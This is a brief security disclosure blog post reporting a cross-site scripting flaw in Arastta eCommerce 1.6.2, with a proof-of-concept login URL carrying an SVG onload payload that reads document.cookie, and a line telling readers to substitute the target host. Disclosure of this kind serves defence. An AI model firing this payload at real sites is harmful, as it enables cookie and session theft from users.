Arastta 1.6.2 XSS Disclosure

Synopsis: Arastta 1.6.2 xss vulnerability Product: Arastta eCommerce: Free Shopping Cart Version: 1.6.2 Researcher: Matt Landers mattjoeland@gmail.com twitter.com/matthewjland https://mjlanders.org/


The xss that I have found is fairly straight forward.
http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace 'inserthostnamehere.com' with the server you would like to test.

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

Share this:

Like this:

Leave a Reply Cancel reply